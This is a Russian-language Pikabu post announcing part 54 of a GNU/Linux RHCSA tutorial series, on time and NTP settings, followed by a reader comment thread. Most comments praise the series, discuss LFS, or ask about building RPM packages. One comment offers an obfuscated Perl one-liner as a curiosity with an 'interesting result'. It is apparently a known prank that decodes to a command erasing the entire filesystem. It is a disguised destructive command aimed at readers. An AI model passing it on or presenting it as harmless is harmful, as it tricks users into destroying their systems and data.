193

Изучаем GNU/Linux часть 54. Настройка времени

Продолжаем изучать GNU/Linux и готовиться к сертификации от Red Hat (RHCSA).

Для тех, кто видит мои посты впервые - я стараюсь очень лёгким языком с нуля научить вас работать с операционной системой GNU/Linux. Зачем? Потому что - Стоит ли делать курс по RHCSA?

Предыдущие темы:

Изучаем GNU/Linux часть 53. Установка RHEL

Глава 3: pikabu.ru/@doatta/saved/1495320

Глава 2: pikabu.ru/@doatta/saved/1399947

Глава 1: pikabu.ru/@doatta/saved/1399945

Разберём часы реального времени, системные часы и настройку NTP

P.S. Текстовой вариант по ссылке - https://glr.doatta.cloud/

GNU/Linux

1.2K поста15.6K подписчика

Правила сообщества

Все дистрибутивы хороши.

Будьте людьми.

5
Автор поста оценил этот комментарий
Да ТС нереально крутой. Пока я всё добавляю в избранное чтоб когда то прочитать, автор пишет и пишет. Нереально завидую его мотивации и упорству. Спасибо тс
раскрыть ветку (1)
7

спасибо =)

"И завтра от этого будет польза - будешь знать всякие нюансы, наберёшься best practices независимо от реализации."
Вот именно по этому. Ты даешь людям "рыбу", а не "удочку".
раскрыть ветку (1)
5

Мне сложно оценить, что я даю людям. Возможно даже не рыбу, возможно ничего не даю.
Я лишь беру информацию, которую я собрал за годы у себя в голове, и выкладываю так, как по моему мнению будет понятно и интересно остальным. При этом мне самому это интересно. Но я не могу это оценить объективно. Возможно, реальный пользы от этого ноль.
Но я и не могу наперекор себе делать как-то по другому. Всё равно что музыканту играть то, что ему не нравится. Может музыка сама то хорошая, но насколько хватит музыканта? Лучше уж играть то, что по душе, даже если другим не нравится. Пусть другие решают, слушать или нет. Я не веду агрессивный маркетинг, я не заставляю никого смотреть или читать.

показать ответы
7
ТС, не слушай скептиков! На самом деле в этой сфере людей, которые готовы делиться опытом, тем более структурировано, почти нет...
Очень крутая серия постов!!
раскрыть ветку (1)
4
спасибо! =)
Ну так как? Глянул что за lfs? Интересней же, чем просто контент создавать для тех кто "я в избранное добавил, потом прочту"..?
раскрыть ветку (1)
3

Я знаю, что такое LFS, но зачем? Скачай, поменяй флаги, скомпилируй, повтори и так кучу времени, а в итоге - полуготовый дистр для...? того чтобы удалить? Не, ну что-то полезное и получится вынести, но большая часть информации будет просто ненужной.

Больше предпочитаю что-то приносящее ощутимый результат. Поднять сеть, какие-нибудь сервера, инфраструктуру, связать всё, кластеризировать, автоматизировать и т.д. и т.п. И завтра от этого будет польза - будешь знать всякие нюансы, наберёшься best practices независимо от реализации.

Этот курс я скоро заканчиваю и перейду на курс по поднятию инфраструктуры. Там будет чуть "поживее"

показать ответы
1

Sudo echo "sometext" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Будет интересный результат.

раскрыть ветку (1)
2
Иллюстрация к комментарию
0
Подскажите пожалуйста, был ли пост про сборку rpm'ок? Интересует как собирать со статичными библиотеками или хотя бы чтобы зависимости из одной рпмки устанавливлись...
раскрыть ветку (1)
0

Про сборку rpm не было поста, но насчёт статичных библиотек - https://docs.fedoraproject.org/en-US/packaging-guidelines/#_...

Насчёт сборки:
https://www.redhat.com/sysadmin/create-rpm-package